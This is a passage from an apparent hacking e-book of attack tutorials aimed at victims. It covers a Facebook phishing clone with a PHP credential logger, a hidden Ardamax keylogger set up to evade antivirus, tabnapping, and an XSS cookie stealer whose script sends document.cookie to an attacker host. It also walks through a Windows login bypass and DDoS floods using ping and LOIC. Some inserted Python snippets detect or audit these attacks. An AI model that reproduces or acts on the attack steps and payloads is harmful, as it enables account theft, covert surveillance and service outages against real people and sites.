applies to each and every one, like gmail.com, yahoo.com, live.com, hotmail.com,
facebook.com, twitter.com, flickr, mail.com, rediffmail.com, in.com and the rest of the
websites which provide these services.
So I am going to demonstrate it on Facebook.

Step-1 :-
Register with any free web hosting website. Some websites give cPanel hosting,
which is better for phishing, but anyway there are plenty of websites which provide free
hosting. Some of them are:
www.000webhost.com
www.100gb.co
www.x10hosting.com
Register with one of the above free web hosts and confirm the hosting. Once you have done
this, go to Step 2.
Step-2 :-
Now go to www.facebook.com and press Ctrl+U, or right click on the web page and
choose View Source; now copy all of this source code and paste it into a new Notepad file.
Step-3 :-
Now save this Notepad file with the name index.html on your desktop or in a folder
of your choice.
Step-4 :-
Now open one more Notepad file and copy the whole code below into it.

From <?php to ?>, copy the content to a new Notepad file and save it with any
name, anyname.php. I am going to save it with the name login.php; you can use any name that
you want, but ensure that the extension is .php. In the content there is a txt file
(log.txt); you can give the txt file any name which is not guessable. I just put log.txt, but
you should make sure that name is unguessable; its extension may be .txt or nothing.
<?php
// Send the browser straight on to the real site
header("Location: http://www.facebook.com/");
// Open the log file in append mode
$handler = fopen("log.txt", "a");
// Write every submitted form field as name=value, one per line
foreach ($_POST as $variable => $value) {
    fwrite($handler, $variable);
    fwrite($handler, "=");
    fwrite($handler, $value);
    fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
exit;
?>

Step-5 :-
Now, again open the index.html file in Notepad (I would recommend you
use Notepad++ for these kinds of tasks; it is an awesome and flexible text editor), and find
(Ctrl+F to find) the keyword action here. You will see a keyword
action=https://www.face**** or something like this; remove this whole link which is under
double quotes and put login.php there. Save it and exit (Ctrl+S to save).
Step-6 :-
Now upload the login.php and index.html files to your file manager directory. If it is a
cPanel account, upload the files into file_manager -> public_html, or if it is a
000webhost.com account upload index.html and login.php into the file manager as shown
in the image below.

If you are logged into your 000webhost.com account, click on Go to
Cpanel in front of the domain that you registered, then go to File
Manager under Files and log into it. Now click on public_html. Now click on
upload and upload both your files.
Step-7 :-
Now visit your subdomain, like yourname.000webhost.com, and you will see
a phishing page of facebook.com. Now send this link to a victim, say anything like "join
my network" or any social engineering trick to force the victim to visit your page and let
him/her enter the username and password. Once he/she enters the information, the username
and password will be saved into the log.txt file and the victim will be redirected to Facebook's original
link, facebook.com. It will seem to the victim that he entered a wrong username and password,
so he will enter them again, and when he enters the info again he/she will successfully
log into their Facebook account. Game over!!!!
Step-8 :-
Now go to yourname.000webhost.com/log.txt and see the username and
password of the victim. You can also visit your cPanel; there in file manager
> public_html you will see a file log.txt; open it to view the victim's username and
password.
Sorry, but I am not going to tell you similar hacking for any other website, since
the steps are the same! Also I don't like chunks of the same info!
We can also use the same method to hack any online account, like bank
accounts, Gmail accounts etc. The thing you have to do is make your own as-is
phishing page, or search on Google for phishing pages of different websites; if you are
lucky enough then you will find the phishing page!
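Step 5 is the tell: the login form's action no longer points at the real site. The following Python is an added example, not from the e-book, written for the defending side: it pulls every form action out of a saved page and reports forms that submit to a host other than the expected one, or over plain HTTP. The two page snippets are constructed; yourname.000webhost.com is the hosting name the section itself uses.

```python
"""Flag login forms that submit somewhere other than the site they imitate.

Added example for this section; it is not code from the e-book. The two page
snippets are constructed: the genuine one stands in for the real login form,
the cloned one is the copied page after Step 5, with its action rewritten to
login.php. yourname.000webhost.com is the hosting name the section uses.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

GENUINE_URL = "https://www.facebook.com/"
GENUINE_PAGE = (
    '<form method="post" action="https://www.facebook.com/">'
    '<input name="email"><input name="pass" type="password"></form>'
)
CLONE_URL = "http://yourname.000webhost.com/index.html"
CLONED_PAGE = (
    '<form method="post" action="login.php">'
    '<input name="email"><input name="pass" type="password"></form>'
)


class FormCollector(HTMLParser):
    """Collect the action attribute of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            # A missing action means "post back to this page"
            self.actions.append(dict(attrs).get("action") or "")


def form_targets(page_url, html):
    """Absolute URLs the page's forms submit to (relative actions resolved)."""
    collector = FormCollector()
    collector.feed(html)
    return [urljoin(page_url, action) for action in collector.actions]


def suspicious_forms(page_url, html, expected_host):
    """Findings for forms that post off-site or over plain HTTP."""
    findings = []
    for target in form_targets(page_url, html):
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
        on_expected = host == expected_host or host.endswith("." + expected_host)
        if not on_expected:
            findings.append(
                f"form submits to {host or '?'} instead of {expected_host}: {target}"
            )
        elif parts.scheme != "https":
            findings.append(f"form submits over {parts.scheme}, not https: {target}")
    return findings


if __name__ == "__main__":
    print(suspicious_forms(GENUINE_URL, GENUINE_PAGE, "www.facebook.com"))
    print(suspicious_forms(CLONE_URL, CLONED_PAGE, "www.facebook.com"))
```

The same comparison is what the browser's address bar offers the user for free: a login form for one site served from a different host is the whole attack, and the page look, which Step 2 copies perfectly, is not what a check should rely on.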







USING KEYLOGGER (KEYLOGGING) !
By keylogging you will get each and every piece of information about what your victim is
doing or typing. Here is one of the best keyloggers, ARDAMAX; a free
keylogger, kidlogger, also exists: search on Google.
Once you have installed the keylogger's victim file on the victim's PC, you will get all those
things which that victim types, so the Facebook and Gmail account credentials!
Step 1: Download Ardamax keylogger: http://adfoc.us/10187334395217
(a patch is also included!)
Step 2: Follow the readme file in the archive.

Step 3: Now, again right click on the Ardamax taskbar icon and select Remote
Installation to see the Remote Installation window; click Next on it.


Step 4: Click on Next to get Appearance screen. Here, click on Additional
components and untick Log Viewer and hit Next.


Step 5: Now,on Invisibility screen, check all options and hit Next.


Step 6: Now, on the Security screen, click on Enable and put in the password (remember
this password, you'll need it later). Check all boxes and hit Next.



Step 7: Now you come to Options; select options as you need, e.g. it is better to
have the keylogger run after every restart, so tick Run On Windows Startup, and so on.
Click on Next.


Step 8: On the Control screen, check the box Send log every and put the time as 5/10
minutes (whatever you want). Then, in delivery, check Email. Leave Include as it is.
And uncheck Send only if log size exceeds. Proceed with Next.


Step 9: Now, on Email (please make sure that you have entered the email ID in the settings
of the delivery options of the Ardamax keylogger):
Send To: enter the email ID to receive keylogs
Username and password: enter the username and password of any email ID, for sending
keylogs to the email ID which you mentioned above.
Now hit Next.
Step 10: In the Control window don't change anything and hit Next.

Step 11: In Screenshots window, select options as you need and hit Next.


Step 12: In Webcam window, select options as you need and hit Next.



Step 13: In the Screenshots screen, you can put your own values and hit Next to come
to Destination. Choose the Keylogger Engine path where you want to put the
keylogger on your computer. Untick Open the folder containing the keylogger engine
to avoid being keylogged yourself. Choose the icon you want to use for the
keylogger.




Step 14: Now, click Next and then Finish.


Now you have the keylogger engine ready. But this is detected by antivirus
as a hacktool, so we have to bypass antivirus detection. For this, the keylogger is
crypted using a FUD crypter. I will not talk about this over here as I have written an article
on FUD crypters. After crypting, you need to bind this crypted keylogger file with,
say, an image or a song for further protection, to prevent the victim's suspicion.

Note: Your antivirus may detect the downloaded Ardamax keylogger (hacker
version) file as a virus. Please deactivate your antivirus while installing this Ardamax
keylogger (hacker version). Don't worry, I never play such cheap pranks of hacking
my readers.


TABNAPPING
Tab Napping !


Phishing is a technique through which we can hack an account on any website. It is just a
copy of the website; you send it to your victim and when he/she logs in, his/her
password is stored in your website's password file. For example, if you want to hack
someone's Facebook account, then first of all you need a Facebook phishing page
(this is just like the Facebook login page), upload it to your website and send it to the victim;
when he/she logs in with his/her account, his/her password and email address will
be sent to your email or saved to your website's password file.

Tab Napping: Tab napping is a new hacking trick through which you can't directly hack an
account, but if you use the phishing method together with tab napping then you can hack the
account. Actually tab napping is a script which you put into a site/blog, and when the
user visits your website/blog and reads your article or plays a game or watches a video, then
goes to another tab in the browser which contains another website like YouTube, Google etc.,
and comes back to your website, your website will have been redirected to the phishing
page, telling them to log in with their Facebook/Gmail/Yahoo account to continue. When the
user enters the login information he/she will be sent back to your page and the user's password will
be sent to you.

So What's the Difference?
There's a question in your mind right now: what is the main difference between a
PHISHING ATTACK and TAB-NAPPING? In phishing you had to send the direct
fake FACEBOOK login page, but in tab napping you do not need to send the fake
login page. You give your victim the link to the page which contains a
game/flash/video/anything interesting. If the user leaves that certain TAB unused for
a while, the page automatically redirects to the FAKE LOGIN PAGE.

So Lets Start With the Tutorial:


Things You NEED

1. Create a free account on any FREE web-hosting site
2. The scripts to make the tab-napping successful (will be provided at the end)



3. Now browse to the File Manager of your account (web-hosting) and upload the
files (files will be provided)




4. After the upload is complete, go to your website. You should get a page like the
one in the picture below.



5. Now the most tricky part is sending it to the victim. Be sure to decode the URL
before sending it to the victim.

You can use any of the below:
Free online urldecoder and urlencoder
URL decoder and Encoder
List Of Other Websites
Required files download: http://adfoc.us/10187334395081 and the password
for the downloaded files is IHA

COOKIE STEALING (SESSION HIJACKING)
Cookies Stealing
Here we show how you can hijack a session using JavaScript and PHP. Everyone knows
what XSS is, right? Good, I'll spare you the definition. A common use for XSS is
stealing cookies to hijack sessions and gain access to restricted web content. Cookie
stealing is typically done by forcing a target's browser to issue some sort of GET
request to a server controlled by the attacker, which accepts the target's cookie as a
parameter and processes it in some way. In most cases, when a cookie stealing XSS
attack is successful, it generates a visual clue which can tip off the target. While it is
too late at this point, stealth has been compromised, and that could be the difference
between the user keeping the session active, or clicking log out and rendering your
stolen cookie invalid.
Cookies Stealing And Session Hijacking

What is a cookie?
A cookie, known as a web cookie or HTTP cookie, is a small piece of text stored by the
user's browser. A cookie is sent as a header by the web server to the web browser on
the client side. A cookie is static and is sent back by the browser unchanged every time
it accesses the server. A cookie has an expiration time that is set by the server, and cookies are
deleted automatically after the expiration time. Cookies are used to maintain the user's
authentication and to implement a shopping cart during his navigation, possibly across
multiple visits.
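What decides whether the script described in this section gets anything is a cookie attribute the section does not mention: a cookie set with HttpOnly is not readable from document.cookie, so an XSS payload cannot send it anywhere; Secure and SameSite close the other two exposures (plain-HTTP transport and cross-site requests). The following Python is an added example, not from the e-book: it parses Set-Cookie headers and lists what each one is missing. The two headers are constructed.

```python
"""Audit Set-Cookie headers for the attributes that blunt cookie theft.

Added example for this section; it is not code from the e-book. The two
headers are constructed: the first is the shape of a default PHP session
cookie, the second the same cookie with the three protective attributes set.
"""

WEAK = "PHPSESSID=abc123; Path=/"
HARDENED = "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Bare attributes such as Secure and HttpOnly carry no value
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_cookie(header):
    """Return a list of findings; an empty list means all three attributes are set."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly, so document.cookie exposes it to any XSS payload")
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure, so it is sent in the clear over http://")
    samesite = attrs.get("samesite")
    if samesite in (None, True) or str(samesite).lower() == "none":
        findings.append(f"{name}: no SameSite restriction, so it rides along on cross-site requests")
    return findings


if __name__ == "__main__":
    for header in (WEAK, HARDENED):
        print(header)
        for finding in audit_cookie(header) or ["  ok"]:
            print("  " + finding.strip())
```

HttpOnly is the one that matters for the script that follows: with it set, the JavaScript injected through XSS still runs, but document.cookie no longer contains the session identifier, so there is nothing to append to the logger's URL.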


Cookies Stealing
What can we do after stealing cookie?
Well, as we know websites authenticate their users with a cookie, it can be used to
hijack the victim's session. The victim's stolen cookie can be used in place of our own cookie
to hijack his session.

This is a cookie stealing script that steals the cookies of a user and stores them in a
text file; these cookies can later be utilised.

PHP Code:
<?php

// Work out the client's IP address, preferring proxy-supplied headers when present
function GetIP()
{
    if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown'))
        $ip = getenv('HTTP_CLIENT_IP');
    else if (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown'))
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    else if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown'))
        $ip = getenv('REMOTE_ADDR');
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown'))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = 'unknown';
    return $ip;
}

// Append one line per request to log.txt: the query string carries the cookie value
function logData()
{
    $ipLog = 'log.txt';
    $cookie = $_SERVER['QUERY_STRING'] ?? '';
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'] ?? '';
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $rqst_method = $_SERVER['REQUEST_METHOD'] ?? '';
    $rem_host = $_SERVER['REMOTE_HOST'] ?? '';
    $referer = $_SERVER['HTTP_REFERER'] ?? '';
    $date = date('l dS of F Y h:i:s A');
    $log = fopen($ipLog, 'a+');

    // An .htm/.html log file gets one record per line; a plain text log gets a blank line between records
    if (preg_match('/\bhtm\b/i', $ipLog) || preg_match('/\bhtml\b/i', $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie ");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();

?>

Save the script as cookielogger.php on your server. (You can get free web hosting easily, such as justfree, x10hosting etc.)
Create an empty text file log.txt in the same directory on the web server. The hijacked/hacked cookies will be automatically stored here.
Now for the hack to work we have to inject this piece of JavaScript into the target's page. This can be done by adding a link on a comments page which allows users to add hyperlinks etc. But beware: some sites don't allow JavaScript, so you have to be lucky for this to work. The best way is to look for user-interactive sites which contain comments or forums.
Post the following code, which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>
You can also trick the victim into clicking a link that activates the JavaScript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image can also activate the script. For this purpose you can use the code below.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE" /></a>

All the details like the cookie, IP address and browser of the victim are logged to log.txt on your host server. In the above codes please remove the space in between "java script".
Hijacking the Session:
Now we have the cookie; what do we do with it? Download the Cookie Editor Mozilla plugin (you may find other plugins as well). Go to the target site, open Cookie Editor, replace the cookie with the stolen cookie of the victim and refresh the page. That's it! You should now be in his account.
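As an added defender-side example, not part of the original tutorial, the Python below parses a server's Set-Cookie header and reports which protective attributes are missing: HttpOnly keeps the session cookie out of document.cookie (which is exactly what the logger above depends on), Secure keeps it off plaintext HTTP, and SameSite limits cross-site sends. The two headers are constructed for the example.

```python
"""Audit a Set-Cookie header for the attributes that limit cookie theft and replay."""
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed Set-Cookie headers for the example (not captured from any site)
WEAK_HEADER = "SESSIONID=abc123; Path=/"
HARDENED_HEADER = "SESSIONID=abc123; Path=/; HttpOnly; Secure; SameSite=Strict"


@dataclass
class CookieAudit:
    name: str
    http_only: bool
    secure: bool
    same_site: Optional[str]
    findings: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> CookieAudit:
    """Split a Set-Cookie header into the cookie name and the attributes we care about."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    http_only = secure = False
    same_site = None
    for attr in parts[1:]:
        key, _, value = attr.partition("=")
        key = key.strip().lower()
        if key == "httponly":        # flag attribute, carries no value
            http_only = True
        elif key == "secure":        # flag attribute, carries no value
            secure = True
        elif key == "samesite":      # Strict, Lax or None
            same_site = value.strip().lower() or None
    return CookieAudit(name, http_only, secure, same_site)


def audit_session_cookie(header: str) -> CookieAudit:
    """Record every missing attribute that would have blunted the attack above."""
    cookie = parse_set_cookie(header)
    if not cookie.http_only:
        cookie.findings.append("missing HttpOnly: readable via document.cookie")
    if not cookie.secure:
        cookie.findings.append("missing Secure: sent over plaintext HTTP")
    if cookie.same_site not in ("lax", "strict"):
        cookie.findings.append("SameSite not Lax/Strict: sent on cross-site requests")
    return cookie


if __name__ == "__main__":
    for header in (WEAK_HEADER, HARDENED_HEADER):
        result = audit_session_cookie(header)
        print(result.name, result.findings or "no findings")
```

A cookie that passes this audit is still replayable by anyone who obtains it another way, so the audit covers the script-theft path shown above, not session management as a whole.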



BYPASS WINDOWS 7, XP AND VISTA PASSWORDS
Requirements:
A pen drive, KONUSB software

Step 1:
Download the KONUSB software. (See the link at the end of the post)

Step 2:
Plug the pen drive into the PC/laptop, double click on KONBOOTINSTALL.exe and enter the drive letter of the USB.

Step 3:
Now insert the pen drive into the PC/laptop you want to hack, and boot via USB (using the pen drive).

Step 4:
Next press OK for everything. If it asks for a password, leave it blank and press OK.

NOTE:
This KONUSB software won't change the password of the PC/laptop you hacked. It just bypasses the password restriction. If you remove the pen drive and boot normally, it remains password protected as it was. It works in all operating systems including Windows XP, Vista, Windows 7 etc., 100% working.

LEGENDARY DDOS ATTACK!
WHAT IS A DOS ATTACK?

A Denial of Service (DoS) attack is a malicious attempt by an external agent to cause a situation where the actual resource (the victim undergoing attack) becomes unavailable to its actual visitors or users. This is usually done by overwhelming the target victim with illegitimate traffic in the form of broken/unsolicited page access requests.

A Distributed Denial of Service (DDoS) attack is an advanced form of DoS where the attacking agents are distributed over a huge network (or the internet).

How are DoS attacks executed?

DoS attacks are usually executed by flooding the target servers with unsolicited data packets at an unprecedented rate. This may be done by misconfiguring network routers or by performing a smurf attack on the victim servers. This results in capacity overflow, followed by exhaustion of system resources, which makes the target service unavailable, either temporarily or permanently (in the case of a hardware-targeted DoS attack), to the intended users.
In the case of a DDoS attack, the origins of the unsolicited data packets (sent to flood the bandwidth/resources of the victim servers) are distributed over a large network (or the internet). The overall mechanism of a DDoS attack involves a huge number of compromised network nodes (computers connected to the internet), governed by agent handlers, which are in turn controlled centrally by the actual attacker.
The massive number of compromised computers on the internet are then unknowingly directed by the source attacker to request access to the targeted victim within a minimal time span, which saturates the limited system resources and results in the eventual shutdown of the targeted service.
The most common method employed to compromise a massive number of user agents on the internet (to actually execute a DDoS attack) is to plague as many computers as possible over the internet with malware/trojans built for that particular purpose.
Such trojans can spread via email attachments or via peer-to-peer networks. Whatever the method of spreading, once the intended trojan is silently installed on the uninformed computer, that user agent has been compromised; it is then called a Zombie, and a collection of them is called a botnet. Further, it becomes the prerogative of the source attacker to indirectly command some or all of its zombie agents (the botnet) to request access to the target service.

What are other variants of DoS attacks?

There are many other attacks of similar nature and purpose, such as the smurf attack, nuke bomb, ping of death, banana attack and phlashing, among many others.
How are they counteracted?

The best way to defend a web service from faltering due to a DDoS attack is to keep backup resources of the system intact. As the aim of such an attack is to max out system resources, if the system resources are already abundant and well prepared to face a sudden peak of traffic at any moment, chances are that your web service will survive a DoS (or even DDoS) attack.

What implications can DDoS attacks have?
If the attack is only limited to overwhelming, resource-consuming traffic, the implications are limited to service unavailability for a couple of hours (or a few days in exceptional cases). This not only stresses the website administrators financially but also results in loss of market reputation and puts a question mark on the reliability of the web service.
In the case of hardware-targeted DoS attacks, financial losses can magnify to a great extent, as hosting infrastructure has to be replaced on an urgent basis. This can also lead to critical data loss if backup procedures aren't up to the mark.
With more and more DDoS attacks happening these days, companies and Internet properties are using various types of DDoS mitigation strategies to avoid any worst-case scenario.
DDOS ATTACK TYPES:-
1) Ping of Death:- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim. The ping command makes use of the ICMP echo request and echo reply messages and is commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses the ping command in conjunction with the -l argument (used to specify the size of the packet sent) to ping the target system with a packet that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.
2) Teardrop Attack:- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example, suppose you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in a single packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In a teardrop attack, however, the data packets sent to the target computer contain bytes that overlap with each other:
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it cannot reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems and Windows NT/95 are vulnerable.
3) SYN Flood Attack:- In a SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet, but as all the source IP addresses are invalid, the target system goes into a wait state for an ACK message to arrive from the source. Eventually, due to the large number of connection requests, the target system's memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.
4) Land Attack:- A land attack is similar to a SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet includes the IP address of the target system itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes. Windows NT before Service Pack 4 is vulnerable to this attack.
5) Smurf Attack:- There are 3 players in the smurf attack: the attacker, the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim and sends to the intermediary network's broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.
6) UDP Flood Attack:- Two UDP services, echo (which echoes back any character received) and chargen (which generates characters), were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DoS by connecting the chargen port to the echo port on the same or another machine and generating large amounts of network traffic.
SECTION 3 DDOS ATTACK BASIC TUTORIAL FOR BEGINNERS:-
DoS attacks - "Denial of Service Attack"
It's an attack to deny the service to the legitimate user, so that he suffers; there are several reasons to do that.
The most likely reason is nastiness.
Okay, there are two ways for DoS attacks: one is the lame way and the other is the elite way.

Lame way
Email bombs: it's the technique in which a person's email a/c (account) is flooded with emails; it's the lamest form of DoS attack. All a person has to do is go on the net, get some email bomber like UNA or KABOOM, put in the victim's address and there you go, his email address will be flooded with unwanted emails. There is also
another way: put his email address into some porn subscription and he will get bombed without you doing anything, LOL. When the victim's email a/c gets flooded he has a pain differentiating and deleting the unwanted emails, and it's a huge task. And if the victim is the admin of the server and his email a/c there is flooded, it also eats up his disk space.
Continuous login: suppose a server is configured to allow only a specified number of login attempts, and you know his username; you can lock his account by repeatedly attempting to connect under his name to the server, which will lock his account, and there you go, the legitimate user won't be able to log in, the reason being you locked his a/c.
Okay, now the neophyte way. It's not the elite way, but somewhat better than the lame way; at least you are doing something technical.

SYN Flooding
This is an exploit of the TCP/IP handshake method. Read some basics on TCP/IP. Okay, let's start.
Normal way:-
A SYN packet is sent to the host by the client who intends to establish a connection
SYN Client -------------- Host
Then in the second step the host replies with a SYN/ACK packet to the client
SYN/ACK Client --------------Host
Then in the third and last step the client replies with an ACK packet to the host, and the three-way handshake is complete.
Okay, got it now?
Now in the attack
Several SYN packets are sent to the host via spoofed IP addresses (bad or dead IP addresses); the host replies with a SYN/ACK packet and waits for the ACK packet. However, because the IP address doesn't exist, it keeps waiting; thus the requests queue up and eat the system resources, which causes the server to crash or reboot.

Land attack
A land attack is similar to a SYN attack, but instead of a bad IP address, the IP address of the target system itself is used. This creates an infinite loop, and the target system crashes. However, almost all systems are now configured against this type of attack.
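As an added example (not part of the original tutorial), the Python below tracks the three-way handshake described above over a constructed packet list: a SYN opens a half-open entry, the client's ACK closes it, and the monitor flags a destination with too many half-open entries (SYN flood) as well as any SYN whose source equals its destination (land). The threshold and addresses are assumed values for the example.

```python
"""Stateful half-open connection tracking that flags SYN-flood and land packets."""
from collections import defaultdict
from typing import Dict, List, Tuple

Packet = Tuple[str, str, frozenset]  # (source IP, destination IP, TCP flags set)

# Assumed threshold for this example; a real monitor sizes it to the server's backlog
HALF_OPEN_THRESHOLD = 5

# Constructed packet records: one completed handshake from a real client, six SYNs
# from spoofed addresses that never answer the SYN/ACK, and one land packet whose
# source address equals the destination.
SAMPLE_PACKETS: List[Packet] = (
    [
        ("192.0.2.10", "10.0.0.5", frozenset({"SYN"})),
        ("192.0.2.10", "10.0.0.5", frozenset({"ACK"})),
    ]
    + [(f"203.0.113.{i}", "10.0.0.5", frozenset({"SYN"})) for i in range(1, 7)]
    + [("10.0.0.5", "10.0.0.5", frozenset({"SYN"}))]
)


def track_handshakes(packets: List[Packet], threshold: int = HALF_OPEN_THRESHOLD):
    """Replay packets through the handshake state and return (alerts, half-open per destination)."""
    half_open = set()  # (src, dst) pairs still waiting for the client's ACK
    alerts: List[str] = []
    for src, dst, flags in packets:
        if "SYN" in flags and src == dst:
            # Land packet: the host would be answering itself
            alerts.append(f"land: SYN from {src} addressed to itself")
            continue
        if flags == {"SYN"}:
            # Step 1 seen; the host now sends SYN/ACK and waits
            half_open.add((src, dst))
        elif flags == {"ACK"}:
            # Step 3 seen; the handshake is complete (no-op if we never saw the SYN)
            half_open.discard((src, dst))
    per_dst: Dict[str, int] = defaultdict(int)
    for _, dst in half_open:
        per_dst[dst] += 1
    for dst, count in sorted(per_dst.items()):
        if count >= threshold:
            alerts.append(f"syn-flood: {count} half-open connections toward {dst}")
    return alerts, dict(per_dst)


if __name__ == "__main__":
    found, counts = track_handshakes(SAMPLE_PACKETS)
    print(counts)
    for line in found:
        print(line)
```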

Smurf Attack
A smurf attack is a sort of brute-force DoS attack, in which a huge number of pings are sent, normally through the router, using a spoofed IP address from within the target network, so when each host gets the ping it echoes it back, causing the network to flood and thus jamming the traffic.
UDP flooding
This kind of flooding is done against two target systems and can be used to stop the services offered by either of the two systems. Both of the target systems are connected to each other, one generating a series of characters for each packet received (in other words, running the UDP character generating service) while the other system echoes all characters it receives. This creates an infinite, non-stopping
loop between the two systems, making them useless for any data exchange or service provision.
PING OF DEATH
This attack doesn't work now, as all the servers are patched against this type of attack. In this attack a target system is pinged with a data packet exceeding the normal size allowed by TCP/IP, i.e. 65536. This will cause the system to reboot or hang up.
Tear Drop
When data is passed from one system to another it is broken down into smaller fragments, and then in the receiving host they are reassembled. These packets have an offset field in their TCP header part which specifies from which part to which part the data carries, or the range of data it is carrying. This, along with the sequence numbers, helps the receiving host reassemble the data. In a teardrop attack the packets are sent with overlapping offset field values, thus the receiving host is unable to reassemble them and crashes.
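As an added example (not part of the original tutorial), this Python reassembler applies the teardrop condition from both passages above: it accepts the 1-1000 / 1001-2000 / 2001-3000 fragments, even when they arrive out of order, but rejects the overlapping 1-1500 / 1001-2000 / 1500-2500 set instead of attempting to reassemble it. The fragment lists are constructed from the byte ranges the text uses.

```python
"""Fragment reassembly that refuses overlapping ranges instead of crashing on them."""
from typing import List, Tuple

Fragment = Tuple[int, int, bytes]  # (first_byte, last_byte, payload); 1-based inclusive


class OverlappingFragments(ValueError):
    """Raised when two fragments claim the same byte positions (the teardrop condition)."""


# Constructed fragment sets using the byte ranges from the text
NORMAL_FRAGMENTS: List[Fragment] = [
    (1, 1000, b"a" * 1000),
    (1001, 2000, b"b" * 1000),
    (2001, 3000, b"c" * 1000),
]
TEARDROP_FRAGMENTS: List[Fragment] = [
    (1, 1500, b"a" * 1500),
    (1001, 2000, b"b" * 1000),
    (1500, 2500, b"c" * 1001),
]


def reassemble(fragments: List[Fragment]) -> bytes:
    """Return the reassembled bytes, or raise before touching any overlapping data."""
    ordered = sorted(fragments, key=lambda f: f[0])  # arrival order does not matter
    expected_next = 1
    out = bytearray()
    for first, last, payload in ordered:
        if last < first or last - first + 1 != len(payload):
            raise ValueError(f"fragment {first}-{last} does not match its payload length")
        if first < expected_next:
            # This fragment starts inside a range already filled: teardrop
            raise OverlappingFragments(
                f"fragment {first}-{last} overlaps bytes up to {expected_next - 1}"
            )
        if first > expected_next:
            raise ValueError(f"missing bytes {expected_next}-{first - 1}")
        out += payload
        expected_next = last + 1
    return bytes(out)


def is_teardrop(fragments: List[Fragment]) -> bool:
    """True when the fragment set would make a naive reassembler overlap its buffers."""
    try:
        reassemble(fragments)
    except OverlappingFragments:
        return True
    return False


if __name__ == "__main__":
    print(len(reassemble(NORMAL_FRAGMENTS)), "bytes reassembled")
    print("teardrop detected:", is_teardrop(TEARDROP_FRAGMENTS))
```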
DDOS ATTACK MANUALLY:-
First open CMD (Run => cmd).
Now follow these steps:
o Type this command in CMD: ping www.anysite.com
o You will get the IP of the victim.
o Now type: ping (IP of site) -t -l 65000
Here 65000 is the packet size.
Now your PC will send huge traffic to that site :D
Check that site after 1 hour; it will be down..!!!
Try this from more PCs for a good response..!!!
DDOS ATTACK BY LOIC:-

For this tutorial we will be using one of the most effective and least known tools, called "Low Orbit Ion Cannon"; this tool was created by Anonymous members from 4chan.org. This program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites.
An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace, Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Download LOIC (Low Orbit Ion Cannon):
www.sourceforge.net/projects/loic
Type the target URL in the URL box.
Click "Lock on".
Change the threads to 9001 for maximum efficiency.
